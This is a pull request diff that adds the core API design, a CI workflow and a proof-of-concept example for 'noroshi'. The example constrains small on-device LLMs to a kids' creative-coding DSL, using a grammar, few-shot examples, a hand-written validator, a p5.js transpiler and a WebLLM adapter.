### PR TITLE
Add minimal API and creative-coding-p5js PoC

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,0 +1,33 @@
+name: CI
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        node: ['20', '22']
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Set up Node ${{ matrix.node }}
+        uses: actions/setup-node@v4
+        with:
+          node-version: ${{ matrix.node }}
+          cache: npm
+
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Typecheck
+        run: npm run typecheck
+
+      - name: Tests
+        run: npm test
+
+      - name: Build
+        run: npm run build

--- a/.gitignore
+++ b/.gitignore
@@ -6,3 +6,6 @@ dist
 .idea
 *.swp
 *.swo
+
+# Claude Code per-project memory / scratch
+.claude/

--- a/DESIGN.md
+++ b/DESIGN.md
@@ -1,0 +1,66 @@
+# noroshi — minimal API design (draft)
+
+Status: initial draft, 2026-05-17. See [src/types.ts](src/types.ts) for the authoritative signatures.
+
+## Goals
+
+1. Single public entry point: `generate(opts)` → `Promise<GenerateResult>`.
+2. Runtime-agnostic core. No direct imports of WebLLM, transformers.js, LiteRT-LM, Node `fetch`, etc.
+3. Pluggable LLM transport (`LLMAdapter`), pluggable validator (`Validator`), pluggable ranker (`Ranker`).
+4. Stay close to Wang et al. 2023 in semantics: BNF/EBNF grammar injection → few-shot block (optionally with derivation) → user task.
+
+Non-goals (for v0):
+
+- Logits-level constrained decoding. The whole point is that we work where logits aren't reachable.
+- Built-in RAG / similarity search for example selection. Caller passes a pre-selected `examples[]`.
+- Multi-turn / streaming. v0 returns a single completed string.
+
+## Public surface
+
+```ts
+import { generate, buildPrompt, StubAdapter } from "noroshi";
+import type {
+  LLMAdapter, Validator, Ranker,
+  FewShotExample, GenerateOptions, GenerateResult,
+} from "noroshi";
+```
+
+That's the entire export list.
+
+## Why these shapes
+
+- `LLMAdapter.complete + optional sampleN` — most runtimes do one prompt → one string. LiteRT-LM `numResponses`, OpenAI `n`, and WebLLM batch can implement `sampleN` for a one-call self-consistency speedup; otherwise core falls back to `Promise.all(complete × N)`.
+- `Validator` is sync. Parsers (nearley Earley, regex) are fast and pure, so async is unjustified overhead. If a future validator needs IO (remote schema fetch), wrap it in a memoizing adapter and keep `validate()` sync.
+- `Ranker.rank` is async (returns scores). Custom rerankers might call a scoring model; can't force sync.
+- Self-consistency rerank default is **first-valid-wins**, not majority-vote. Reason: for novel DSLs, hash-based majority on a string output is noisy (whitespace, ordering). The validator gives the strongest signal noroshi has by default.
+- Retry is opt-in (`retry.maxAttempts`). When enabled with `includeErrorInPrompt`, the validator's error string is appended to the next prompt as "Prior attempt failed validation with: …". This is the cheapest signal-boost we can give without restructuring the prompt.
+
+## BNF parser choice — nearley
+
+See `memory/project_parser_choice.md` for the full rationale. Summary:
+
+- nearley accepts BNF + EBNF (`* ? +`), uses Earley → handles ambiguity and left-recursion.
+- ohm-js is PEG → ordered choice, no left recursion, no ambiguity reporting. PEG syntax would diverge from what we inject in the prompt.
+- We inject the grammar **into the prompt verbatim**. Grammar source format should be what LLMs see most in training (BNF / EBNF / `.lark`). nearley `.ne` is the closest JS analog of berlino's `.lark` files.
+
+The validator stays optional and pluggable. Consumers who don't want a nearley dep can plug a regex or hand-rolled checker. The example apps (starting with `examples/creative-coding-p5js/`) will ship pre-compiled grammars (via `nearleyc`) to avoid runtime compilation cost in the browser.
+
+## LLM adapter structure
+
+`LLMAdapter` is the only required external integration point.
+
+```
+StubAdapter ────────────── echo / canned (built-in, for tests + offline dev)
+WebLLMAdapter ──────────── wraps mlc-ai/web-llm
+TransformersJsAdapter ─── wraps xenova/transformers
+LiteRtLmAdapter ────────── wraps @mediapipe/tasks-genai (forwards `numResponses` via runtimeHints → sampleN)
+FetchAdapter ───────────── wraps an OpenAI/Anthropic-compatible HTTP endpoint
+```
+
+Only `StubAdapter` ships in v0. The others are example-level integrations; we keep them out of `noroshi` core so the bundle stays small and runtime-neutral.
+
+## Open questions (for v0.1+)
+
+- Async ranker integration in `noroshi.ts::pick` — currently degrades to first-valid when a ranker is provided. Need to restructure once a real ranker arrives.
+- Streaming. The `LLMAdapter` contract may grow `stream()` returning an async iterable. Defer until a user asks.
+- RAG example-bank selection. Out of scope for v0; users curate `examples[]` themselves.

--- a/examples/README.md
+++ b/examples/README.md
@@ -4,9 +4,11 @@ Reference applications demonstrating `noroshi` for various DSLs and browser-side
 
 ## Planned
 
-### `creative-coding-p5js/`
+### `creative-coding-p5js/` — **PoC available**
 
 A creative coding DSL with a p5.js transpiler. Uses `noroshi` to constrain a small on-device LLM (Gemma 4 E2B / Phi-3 / Llama 3.2 1B) to a reduced creative-coding surface area, then transpiles to p5.js for browser rendering. Targets natural-language → visual sketch flows including kids' vibe coding apps.
+
+Status v0 (2026-05-17): grammar + few-shot bank + hand-rolled validator + transpiler + retry-with-feedback PoC runner (Node, stub LLM) + static browser harness. See [`creative-coding-p5js/README.md`](./creative-coding-p5js/README.md).
 
 ### Additional DSL examples
 
@@ -16,4 +18,4 @@ A creative coding DSL with a p5.js transpiler. Uses `noroshi` to constrain a sma
 
 ## Status
 
-This directory is a placeholder. Reference applications will be added as `noroshi` matures.
+`creative-coding-p5js/` is the first end-to-end PoC. Other DSLs listed above remain placeholders and will be added as `noroshi` matures.

--- a/examples/creative-coding-p5js/README.md
+++ b/examples/creative-coding-p5js/README.md
@@ -1,0 +1,84 @@
+# creative-coding-p5js
+
+PoC example for `noroshi` — natural language → constrained creative-coding DSL → p5.js sketch.
+
+Target audience: kids' vibe-coding apps that need to run a small LLM (Gemma 4 E2B / Phi-3 / Llama 3.2 1B) on-device and constrain it to a tiny safe-by-construction visual DSL.
+
+## Files
+
+| File | Purpose |
+|------|---------|
+| `grammar.lark` | BNF/EBNF grammar of the DSL (injected into the prompt verbatim). |
+| `examples.ts`  | Few-shot bank (input → derivation → output). |
+| `validator.ts` | Hand-rolled tokenizer + recursive-descent validator (no nearley dep). |
+| `transpile.ts` | DSL → p5.js source. |
+| `index.ts`     | PoC entry: stub LLM → noroshi.generate → validate → transpile. |
+| `test.ts`      | Smoke test: validate + transpile every few-shot, plus negative cases. |
+| `index.html`   | Browser harness: paste DSL, see live p5.js render. |
+
+## DSL surface
+
+Statement-oriented, whitespace-separated, `{ ... }` blocks, no terminator.
+
+```text
+background white
+fill red
+circle w / 2 h / 2 50
+```
+
+Built-in variables (in expressions):
+
+| Name | Meaning |
+|------|---------|
+| `t`  | elapsed seconds |
+| `f`  | frame counter   |
+| `w` `h` | canvas size  |
+| `mx` `my` | mouse position |
+| `i`  | repeat-loop counter (only valid inside `repeat`) |
+
+Built-in functions: `sin`, `cos`, `random`, `abs`.
+
+Blocks:
+- `setup { ... }` — runs once
+- `tick { ... }`  — runs every frame
+- top-level statements w/o blocks run once (single-frame sketch)
+
+## Run the PoC (Node + stub LLM)
+
+```bash
+# from repo root
+npx tsx examples/creative-coding-p5js/index.ts
+```
+
+Runs three scenarios:
+1. Static rainbow (`repeat` + `rgb(...)`).
+2. Animated yellow square (`tick` + `sin(t)`).
+3. Retry-on-invalid (stub returns malformed DSL first; validator triggers retry with error feedback).
+
+## Run the smoke test
+
+```bash
+npx tsx examples/creative-coding-p5js/test.ts
+```
+
+Asserts every few-shot validates and transpiles, plus negative cases (unknown keyword, wrong arity, unbalanced braces).
+
+## Swap in a real LLM
+
+Replace `StubAdapter` in `index.ts` with any object that satisfies `LLMAdapter`:
+
+```ts
+class WebLLMAdapter implements LLMAdapter {
+  readonly id = "webllm";
+  async complete(prompt: string, opts) { /* call mlc-ai/web-llm */ }
+  async sampleN(prompt: string, n: number, opts) { /* batch generate */ }
+}
+```
+
+See `DESIGN.md` at the repo root for the full adapter contract.
+
+## Grammar v0 design notes
+
+- Single source of truth: `grammar.lark` is what the LLM reads (in the prompt) AND, in a later iteration, what gets compiled to nearley for full parsing. For v0 the validator is hand-rolled to keep the example dependency-free.
+- Scope was kept aggressively small: 4 shapes, 10 named colors + `rgb()`, 4 math funcs, `setup`/`tick`/`repeat` control flow. The Wang et al. result says effect is strongest for novel DSLs the model hasn't memorized — small + uncommon wins over expressive + Pythonic here.
+- All transpiled output is deterministic and bounded: `repeat` requires an integer literal (no expressions), all coordinates are pure expressions over the safe variable set, no `eval`/string ops. Safe to render kids' input.

--- a/examples/creative-coding-p5js/examples.ts
+++ b/examples/creative-coding-p5js/examples.ts
@@ -1,0 +1,78 @@
+import type { FewShotExample } from "../../src/index.js";
+
+/**
+ * Hand-curated few-shot bank for the noroshi-creative DSL.
+ *
+ * Each example pairs a natural-language task with a valid DSL program. The
+ * `derivation` field shows the grammar reductions Wang et al. style — the
+ * model learns to emit derivation → output, which steers it onto the grammar
+ * surface for novel DSLs.
+ *
+ * Keep this list short (3–5 entries). The strongest examples cover:
+ *  - static drawing (shapes + color)
+ *  - background + multiple shapes
+ *  - animation via `tick` and `t`/`f`
+ *  - `repeat` with the `i` counter
+ *  - mouse interaction with `mx`/`my`
+ */
+export const FEW_SHOTS: FewShotExample[] = [
+  {
+    input: "Draw a red circle in the middle of the canvas.",
+    derivation: [
+      "start → block",
+      "block → stmt",
+      "stmt → bg_stmt | shape_stmt (×2)",
+      "shape_stmt → fill color (red), circle expr expr expr",
+    ].join("\n"),
+    output: [
+      "background white",
+      "fill red",
+      "circle w / 2 h / 2 50",
+    ].join("\n"),
+  },
+  {
+    input: "Make a bouncing yellow square that moves left and right.",
+    derivation: [
+      "start → block (setup) block (tick)",
+      "setup → background black",
+      "tick → fill yellow, square (sin(t) * 100 + w/2) h/2 40",
+    ].join("\n"),
+    output: [
+      "setup {",
+      "  background black",
+      "}",
+      "tick {",
+      "  background black",
+      "  fill yellow",
+      "  square sin(t) * 100 + w / 2 h / 2 40",
+      "}",
+    ].join("\n"),
+  },
+  {
+    input: "Draw 10 blue circles in a horizontal row.",
+    derivation: [
+      "start → block",
+      "block → bg_stmt, fill blue, repeat 10 { circle (i * 40 + 20) h/2 15 }",
+    ].join("\n"),
+    output: [
+      "background white",
+      "fill blue",
+      "repeat 10 {",
+      "  circle i * 40 + 20 h / 2 15",
+      "}",
+    ].join("\n"),
+  },
+  {
+    input: "A pink circle follows the mouse, on a black background.",
+    derivation: [
+      "tick → background black, fill pink, circle mx my 30",
+    ].join("\n"),
+    output: [
+      "tick {",
+      "  background black",
+      "  fill pink",
+      "  circle mx my 30",
+      "}",
+    ].join("\n"),
+  },
+];

--- a/examples/creative-coding-p5js/grammar.lark
+++ b/examples/creative-coding-p5js/grammar.lark
@@ -1,0 +1,73 @@
+// noroshi-creative — minimal creative coding DSL for kids' vibe-coding.
+// Compiles to p5.js. Tokens are whitespace-separated; blocks use { ... }.
+// No statement terminator. Comments start with // and run to end of line.
+//
+// Built-in variables:
+//   t   = elapsed seconds (float)
+//   f   = frame counter   (int)
+//   w   = canvas width    (int)
+//   h   = canvas height   (int)
+//   mx  = mouse X         (int)
+//   my  = mouse Y         (int)
+//   i   = repeat loop counter (only valid inside `repeat`)
+//
+// Built-in functions:
+//   sin(x), cos(x), random(lo, hi), abs(x)
+
+start: block+
+
+block: setup_block
+     | tick_block
+     | stmt
+
+setup_block: "setup" "{" stmt* "}"
+tick_block:  "tick"  "{" stmt* "}"
+
+stmt: shape_stmt
+    | color_stmt
+    | transform_stmt
+    | bg_stmt
+    | repeat_stmt
+
+shape_stmt: "circle" expr expr expr             // x y radius
+          | "square" expr expr expr             // x y size
+          | "rect"   expr expr expr expr        // x y w h
+          | "line"   expr expr expr expr        // x1 y1 x2 y2
+
+color_stmt: "fill"   color
+          | "stroke" color
+          | "no_fill"
+          | "no_stroke"
+
+bg_stmt: "background" color
+
+transform_stmt: "rotate"    expr
+              | "translate" expr expr
+              | "push"
+              | "pop"
+
+repeat_stmt: "repeat" INT "{" stmt* "}"
+
+color: COLOR_NAME
+     | "rgb" "(" expr "," expr "," expr ")"
+
+expr: term (("+" | "-") term)*
+term: factor (("*" | "/") factor)*
+factor: NUMBER
+      | VAR
+      | "(" expr ")"
+      | func_call
+
+func_call: FUNC "(" expr ("," expr)* ")"
+
+FUNC:       "sin" | "cos" | "random" | "abs"
+VAR:        "t" | "f" | "w" | "h" | "mx" | "my" | "i"
+COLOR_NAME: "red"   | "blue"  | "green"  | "yellow"
+          | "white" | "black" | "pink"   | "purple"
+          | "orange"| "gray"
+INT:    /[0-9]+/
+NUMBER: /-?[0-9]+(\.[0-9]+)?/
+
+%import common.WS
+%ignore WS
+%ignore /\/\/[^\n]*/

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -318,6 +318,7 @@ export function transpile(src) {
   const setupBody = [
     `createCanvas(400, 400);`,
     ...setup,
+    ...(hadTick ? top : []),
     ...(hadTick ? [] : ["noLoop();"]),
   ].join("\n  ");
   const drawBody = (hadTick ? tick : top).join("\n  ") || "/* empty */";

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -1,7 +1,8 @@
-// Self-contained ESM port of validator.ts + transpile.ts for the static
-// browser harness in index.html. Keep in sync with the TS sources — they
-// are the authoritative implementations; this file exists only because the
-// PoC ships a single-file static page (no bundler).
+// Self-contained ESM port of validator.ts + transpile.ts + noroshi core +
+// few-shots + WebLLM adapter for the static browser harness in index.html.
+// Keep in sync with the TS sources — they are the authoritative
+// implementations; this file exists only because the PoC ships a single-file
+// static page (no bundler).
 
 const KEYWORDS = new Set([
   "setup", "tick", "circle", "square", "rect", "line",
@@ -321,4 +322,218 @@ export function transpile(src) {
   ].join("\n  ");
   const drawBody = (hadTick ? tick : top).join("\n  ") || "/* empty */";
   return `function setup() {\n  ${setupBody}\n}\n\nfunction draw() {\n  ${drawBody}\n}\n`;
+}
+
+// --- few-shot bank (mirrors examples.ts) ---
+
+export const FEW_SHOTS = [
+  {
+    input: "Draw a red circle in the middle of the canvas.",
+    derivation: [
+      "start → block",
+      "block → stmt",
+      "stmt → bg_stmt | shape_stmt (×2)",
+      "shape_stmt → fill color (red), circle expr expr expr",
+    ].join("\n"),
+    output: ["background white", "fill red", "circle w / 2 h / 2 50"].join("\n"),
+  },
+  {
+    input: "Make a bouncing yellow square that moves left and right.",
+    derivation: [
+      "start → block (setup) block (tick)",
+      "setup → background black",
+      "tick → fill yellow, square (sin(t) * 100 + w/2) h/2 40",
+    ].join("\n"),
+    output: [
+      "setup {",
+      "  background black",
+      "}",
+      "tick {",
+      "  background black",
+      "  fill yellow",
+      "  square sin(t) * 100 + w / 2 h / 2 40",
+      "}",
+    ].join("\n"),
+  },
+  {
+    input: "Draw 10 blue circles in a horizontal row.",
+    derivation: [
+      "start → block",
+      "block → bg_stmt, fill blue, repeat 10 { circle (i * 40 + 20) h/2 15 }",
+    ].join("\n"),
+    output: [
+      "background white",
+      "fill blue",
+      "repeat 10 {",
+      "  circle i * 40 + 20 h / 2 15",
+      "}",
+    ].join("\n"),
+  },
+  {
+    input: "A pink circle follows the mouse, on a black background.",
+    derivation: ["tick → background black, fill pink, circle mx my 30"].join("\n"),
+    output: [
+      "tick {",
+      "  background black",
+      "  fill pink",
+      "  circle mx my 30",
+      "}",
+    ].join("\n"),
+  },
+];
+
+// --- noroshi core (mirrors src/prompt.ts + src/noroshi.ts) ---
+
+const DEFAULT_SYSTEM = [
+  "You generate output strictly conforming to the grammar below.",
+  "Do not include explanation, prose, code fences, or commentary —",
+  "emit only the DSL string that the grammar would accept.",
+].join(" ");
+
+export function buildPrompt(p) {
+  const parts = [];
+  parts.push(p.systemPrompt ?? DEFAULT_SYSTEM);
+  parts.push("\nGrammar (BNF/EBNF):\n```");
+  parts.push(p.grammar.trim());
+  parts.push("```");
+  if (p.examples?.length) {
+    parts.push("\nExamples:");
+    for (const ex of p.examples) {
+      parts.push(`Task: ${ex.input}`);
+      if (ex.derivation) parts.push(`Derivation:\n${ex.derivation.trim()}`);
+      parts.push(`Output:\n${ex.output.trim()}\n`);
+    }
+  }
+  if (p.errorFeedback) {
+    parts.push(
+      `\nPrior attempt failed validation with: ${p.errorFeedback}\n` +
+        `Produce a new output that fixes this error.\n`,
+    );
+  }
+  parts.push(`\nTask: ${p.task}`);
+  parts.push("Output:");
+  return parts.join("\n");
+}
+
+export async function generate(opts) {
+  const maxAttempts = opts.retry?.maxAttempts ?? 1;
+  const includeErr = opts.retry?.includeErrorInPrompt ?? false;
+
+  let attempts = 0;
+  let lastError;
+  let lastCandidates;
+  let lastValidation;
+
+  for (let attempt = 0; attempt < maxAttempts; attempt++) {
+    const prompt = buildPrompt({
+      task: opts.task,
+      grammar: opts.grammar,
+      examples: opts.examples,
+      systemPrompt: opts.systemPrompt,
+      errorFeedback: includeErr ? lastError : undefined,
+    });
+
+    if (opts.onPrompt) opts.onPrompt(prompt, attempt);
+
+    const n = opts.selfConsistency?.n ?? 1;
+    const candidates = await _sample(opts.llm, prompt, n, opts.sample);
+    attempts += candidates.length;
+    lastCandidates = candidates;
+
+    if (opts.onCandidates) opts.onCandidates(candidates, attempt);
+
+    const picked = _pick(candidates, opts);
+    lastValidation = picked.validation;
+
+    if (!opts.validator) {
+      return { output: picked.output, attempts, candidates: n > 1 ? candidates : undefined };
+    }
+    if (picked.validation?.ok) {
+      return {
+        output: picked.output,
+        attempts,
+        candidates: n > 1 ? candidates : undefined,
+        validation: picked.validation,
+      };
+    }
+    lastError = picked.validation && !picked.validation.ok ? picked.validation.error : "unknown";
+  }
+
+  return {
+    output: lastCandidates?.[0] ?? "",
+    attempts,
+    candidates: lastCandidates,
+    validation: lastValidation,
+  };
+}
+
+async function _sample(llm, prompt, n, opts) {
+  if (n === 1) return [await llm.complete(prompt, opts)];
+  if (llm.sampleN) return llm.sampleN(prompt, n, opts);
+  return Promise.all(Array.from({ length: n }, () => llm.complete(prompt, opts)));
+}
+
+function _pick(candidates, opts) {
+  if (!opts.validator) return { output: candidates[0] ?? "" };
+  for (const c of candidates) {
+    const v = opts.validator.validate(c);
+    if (v.ok) return { output: c, validation: v };
+  }
+  const fallback = candidates[0] ?? "";
+  return { output: fallback, validation: opts.validator.validate(fallback) };
+}
+
+// --- validator wrapper that conforms to the noroshi Validator interface ---
+
+export class CreativeCodingValidator {
+  constructor() { this.id = "creative-coding"; }
+  validate(output) { return validate(output); }
+}
+
+// --- WebLLM adapter ---
+//
+// Wraps an MLCEngine from @mlc-ai/web-llm. The engine is created OUTSIDE this
+// adapter (so the caller controls model id / progress callback / cache); the
+// adapter only knows how to drive chat.completions.create. The completion is
+// post-processed to strip the most common LLM noise we observe with small
+// instruct models: code fences, leading prose, trailing comments. Validator
+// + retry handles the rest.
+
+const FENCE_RE = /^\s*```[a-zA-Z]*\n?|\n?```\s*$/g;
+
+function _cleanCompletion(raw) {
+  let s = String(raw ?? "").replace(FENCE_RE, "");
+  // If the model emitted "Output:" again, take what follows.
+  const m = s.match(/(?:^|\n)\s*Output:\s*\n?([\s\S]*)$/);
+  if (m) s = m[1];
+  // Strip a leading task echo like "Task: ...\n".
+  s = s.replace(/^\s*Task:[^\n]*\n+/, "");
+  // Stop at a fresh "Task:" line — small models love to continue with more
+  // few-shot turns. Keep only the first program.
+  const next = s.match(/\n\s*Task:\s/);
+  if (next) s = s.slice(0, next.index);
+  return s.trim();
+}
+
+export class WebLLMAdapter {
+  constructor(engine, { id = "webllm" } = {}) {
+    this.id = id;
+    this.engine = engine;
+  }
+
+  async complete(prompt, opts = {}) {
+    const reply = await this.engine.chat.completions.create({
+      messages: [{ role: "user", content: prompt }],
+      temperature: opts.temperature ?? 0.2,
+      top_p: opts.topP ?? 0.95,
+      max_tokens: opts.maxTokens ?? 256,
+      stop: opts.stop,
+    });
+    const content = reply?.choices?.[0]?.message?.content ?? "";
+    return _cleanCompletion(content);
+  }
+
+  async sampleN(prompt, n, opts = {}) {
+    return Promise.all(Array.from({ length: n }, () => this.complete(prompt, opts)));
+  }
 }

--- a/examples/creative-coding-p5js/harness.mjs
+++ b/examples/creative-coding-p5js/harness.mjs
@@ -1,0 +1,324 @@
+// Self-contained ESM port of validator.ts + transpile.ts for the static
+// browser harness in index.html. Keep in sync with the TS sources — they
+// are the authoritative implementations; this file exists only because the
+// PoC ships a single-file static page (no bundler).
+
+const KEYWORDS = new Set([
+  "setup", "tick", "circle", "square", "rect", "line",
+  "fill", "stroke", "no_fill", "no_stroke", "background",
+  "rotate", "translate", "push", "pop", "repeat", "rgb",
+]);
+const COLOR_NAMES = new Set([
+  "red","blue","green","yellow","white","black","pink","purple","orange","gray",
+]);
+const VARS = new Set(["t","f","w","h","mx","my","i"]);
+const FUNCS = new Set(["sin","cos","random","abs"]);
+const STMT_STARTERS = new Set([
+  "setup","tick","circle","square","rect","line",
+  "fill","stroke","no_fill","no_stroke","background",
+  "rotate","translate","push","pop","repeat",
+]);
+const ARITY = { circle:3, square:3, rect:4, line:4, rotate:1, translate:2 };
+const COLORS = {
+  red:"'#e74c3c'", blue:"'#3498db'", green:"'#2ecc71'", yellow:"'#f1c40f'",
+  white:"'#ffffff'", black:"'#000000'", pink:"'#ff8fb1'", purple:"'#9b59b6'",
+  orange:"'#e67e22'", gray:"'#95a5a6'",
+};
+const VAR_MAP = {
+  t:"(millis()/1000)", f:"frameCount",
+  w:"width", h:"height", mx:"mouseX", my:"mouseY", i:"__i",
+};
+
+function lex(src, strict) {
+  const toks = [];
+  let i = 0;
+  while (i < src.length) {
+    const c = src[i];
+    if (c === "/" && src[i+1] === "/") { while (i < src.length && src[i] !== "\n") i++; continue; }
+    if (/\s/.test(c)) { i++; continue; }
+    if (c === "{") { toks.push({ kind:"lbrace", value:c, pos:i }); i++; continue; }
+    if (c === "}") { toks.push({ kind:"rbrace", value:c, pos:i }); i++; continue; }
+    if (c === "(") { toks.push({ kind:"lparen", value:c, pos:i }); i++; continue; }
+    if (c === ")") { toks.push({ kind:"rparen", value:c, pos:i }); i++; continue; }
+    if (c === ",") { toks.push({ kind:"comma",  value:c, pos:i }); i++; continue; }
+    if ("+-*/".includes(c)) {
+      const isUnaryNum = c === "-" && /\d/.test(src[i+1] ?? "") && !isOperand(toks);
+      if (!isUnaryNum) { toks.push({ kind:"op", value:c, pos:i }); i++; continue; }
+    }
+    if (c === "-" || /\d/.test(c)) {
+      const s = i;
+      if (c === "-") i++;
+      while (i < src.length && /[\d.]/.test(src[i])) i++;
+      toks.push({ kind:"num", value:src.slice(s,i), pos:s });
+      continue;
+    }
+    if (/[A-Za-z_]/.test(c)) {
+      const s = i;
+      while (i < src.length && /[A-Za-z0-9_]/.test(src[i])) i++;
+      const w = src.slice(s,i);
+      if (KEYWORDS.has(w))    toks.push({ kind:"kw",    value:w, pos:s });
+      else if (COLOR_NAMES.has(w)) toks.push({ kind:"color", value:w, pos:s });
+      else if (VARS.has(w))   toks.push({ kind:"var",   value:w, pos:s });
+      else if (FUNCS.has(w))  toks.push({ kind:"func",  value:w, pos:s });
+      else if (strict) return { error: `unknown identifier "${w}" at offset ${s}` };
+      else toks.push({ kind:"ident", value:w, pos:s });
+      continue;
+    }
+    if (strict) return { error: `unexpected character "${c}" at offset ${i}` };
+    i++;
+  }
+  return toks;
+}
+
+function isOperand(toks) {
+  const last = toks[toks.length-1];
+  if (!last) return false;
+  return last.kind === "num" || last.kind === "var" || last.kind === "rparen" || last.value === ")";
+}
+
+export function validate(src) {
+  const toks = lex(src, true);
+  if (!Array.isArray(toks)) return { ok:false, error: toks.error };
+  const P = mkParser(toks);
+  while (P.p < toks.length) {
+    const r = P.block();
+    if (!r.ok) return r;
+  }
+  return { ok:true };
+}
+
+function mkParser(toks) {
+  const P = {
+    p: 0, toks,
+    peek(o=0) { return toks[P.p+o]; },
+    eat()     { return toks[P.p++]; },
+    block() {
+      const t = P.peek();
+      if (!t) return { ok:true };
+      if (t.kind === "kw" && (t.value === "setup" || t.value === "tick")) {
+        P.eat();
+        return P.brace();
+      }
+      return P.stmt();
+    },
+    brace() {
+      const o = P.eat();
+      if (!o || o.kind !== "lbrace") return { ok:false, error:`expected "{" at offset ${o?.pos ?? -1}` };
+      while (P.peek() && P.peek().kind !== "rbrace") {
+        const r = P.stmt(); if (!r.ok) return r;
+      }
+      const c = P.eat();
+      if (!c || c.kind !== "rbrace") return { ok:false, error:"unbalanced { ... }" };
+      return { ok:true };
+    },
+    stmt() {
+      const t = P.peek();
+      if (!t) return { ok:false, error:"unexpected end of input" };
+      if (t.kind !== "kw") return { ok:false, error:`expected a statement keyword at offset ${t.pos}, got "${t.value}"` };
+      P.eat();
+      switch (t.value) {
+        case "fill": case "stroke": case "background": return P.color();
+        case "no_fill": case "no_stroke": case "push": case "pop": return { ok:true };
+        case "rgb": return { ok:false, error:`"rgb" cannot start a statement` };
+        case "rotate": case "translate":
+        case "circle": case "square": case "rect": case "line": {
+          const n = ARITY[t.value];
+          for (let k = 0; k < n; k++) { const r = P.expr(); if (!r.ok) return r; }
+          return { ok:true };
+        }
+        case "repeat": {
+          const c = P.eat();
+          if (!c || c.kind !== "num" || !/^\d+$/.test(c.value)) return { ok:false, error:`repeat expects a positive integer at offset ${c?.pos ?? -1}` };
+          return P.brace();
+        }
+        case "setup": case "tick":
+          return { ok:false, error:`"${t.value}" block is only valid at the top level` };
+      }
+      return { ok:false, error:`unhandled keyword "${t.value}"` };
+    },
+    color() {
+      const t = P.peek();
+      if (!t) return { ok:false, error:"expected color" };
+      if (t.kind === "color") { P.eat(); return { ok:true }; }
+      if (t.kind === "kw" && t.value === "rgb") {
+        P.eat();
+        const lp = P.eat();
+        if (!lp || lp.kind !== "lparen") return { ok:false, error:`rgb expects "(" at offset ${lp?.pos ?? -1}` };
+        for (let k = 0; k < 3; k++) {
+          const r = P.expr(); if (!r.ok) return r;
+          if (k < 2) { const cm = P.eat(); if (!cm || cm.kind !== "comma") return { ok:false, error:`rgb expects "," at offset ${cm?.pos ?? -1}` }; }
+        }
+        const rp = P.eat();
+        if (!rp || rp.kind !== "rparen") return { ok:false, error:`rgb expects ")" at offset ${rp?.pos ?? -1}` };
+        return { ok:true };
+      }
+      return { ok:false, error:`expected color or rgb(...) at offset ${t.pos}, got "${t.value}"` };
+    },
+    expr() {
+      const r = P.term(); if (!r.ok) return r;
+      while (P.peek()?.kind === "op" && (P.peek().value === "+" || P.peek().value === "-")) {
+        P.eat(); const r2 = P.term(); if (!r2.ok) return r2;
+      }
+      return { ok:true };
+    },
+    term() {
+      const r = P.factor(); if (!r.ok) return r;
+      while (P.peek()?.kind === "op" && (P.peek().value === "*" || P.peek().value === "/")) {
+        P.eat(); const r2 = P.factor(); if (!r2.ok) return r2;
+      }
+      return { ok:true };
+    },
+    factor() {
+      const t = P.eat();
+      if (!t) return { ok:false, error:"expected expression, got end of input" };
+      if (t.kind === "num" || t.kind === "var") return { ok:true };
+      if (t.kind === "lparen") {
+        const r = P.expr(); if (!r.ok) return r;
+        const rp = P.eat();
+        if (!rp || rp.kind !== "rparen") return { ok:false, error:`expected ")" at offset ${rp?.pos ?? -1}` };
+        return { ok:true };
+      }
+      if (t.kind === "func") {
+        const lp = P.eat();
+        if (!lp || lp.kind !== "lparen") return { ok:false, error:`${t.value} expects "("` };
+        const r = P.expr(); if (!r.ok) return r;
+        while (P.peek()?.kind === "comma") { P.eat(); const rk = P.expr(); if (!rk.ok) return rk; }
+        const rp = P.eat();
+        if (!rp || rp.kind !== "rparen") return { ok:false, error:`${t.value} expects ")"` };
+        return { ok:true };
+      }
+      return { ok:false, error:`expected number/variable/func/"(...)" at offset ${t.pos}, got "${t.value}"` };
+    },
+  };
+  return P;
+}
+
+// --- transpiler ---
+
+function mkT(toks) {
+  const T = {
+    p: 0, toks,
+    peek(o=0) { return toks[T.p+o]; },
+    eat()     { return toks[T.p++]; },
+    stmts(stopOnBrace) {
+      const out = [];
+      while (T.peek() && !(stopOnBrace && T.peek().kind === "rbrace")) {
+        out.push(T.stmt());
+      }
+      return out;
+    },
+    stmt() {
+      const t = T.eat();
+      if (!t) return "";
+      const v = t.value;
+      switch (v) {
+        case "background": return `background(${T.color()});`;
+        case "fill":       return `fill(${T.color()});`;
+        case "stroke":     return `stroke(${T.color()});`;
+        case "no_fill":    return "noFill();";
+        case "no_stroke":  return "noStroke();";
+        case "push":       return "push();";
+        case "pop":        return "pop();";
+        case "rotate":     return `rotate(${T.expr()});`;
+        case "translate":  return `translate(${T.expr()}, ${T.expr()});`;
+        case "circle": {
+          const x = T.expr(), y = T.expr(), r = T.expr();
+          return `circle(${x}, ${y}, ${r} * 2);`;
+        }
+        case "square": { const x=T.expr(),y=T.expr(),s=T.expr(); return `square(${x}, ${y}, ${s});`; }
+        case "rect":   { const x=T.expr(),y=T.expr(),w=T.expr(),h=T.expr(); return `rect(${x}, ${y}, ${w}, ${h});`; }
+        case "line":   { const a=T.expr(),b=T.expr(),c=T.expr(),d=T.expr(); return `line(${a}, ${b}, ${c}, ${d});`; }
+        case "repeat": {
+          const n = T.eat().value; T.eat(); // {
+          const body = T.stmts(true); T.eat(); // }
+          return `for (let __i = 0; __i < ${n}; __i++) { ${body.join(" ")} }`;
+        }
+      }
+      return "";
+    },
+    color() {
+      const t = T.eat();
+      if (t.value === "rgb") {
+        T.eat(); const r=T.expr(); T.eat();
+        const g=T.expr(); T.eat();
+        const b=T.expr(); T.eat();
+        return `${r}, ${g}, ${b}`;
+      }
+      return COLORS[t.value] ?? "'#888'";
+    },
+    expr() { return T.bp(0); },
+    bp(min) {
+      let lhs = T.factor();
+      while (true) {
+        const t = T.peek();
+        if (!t || t.kind !== "op") break;
+        const bp = (t.value === "+" || t.value === "-") ? 10 : 20;
+        if (bp < min) break;
+        const op = T.eat().value;
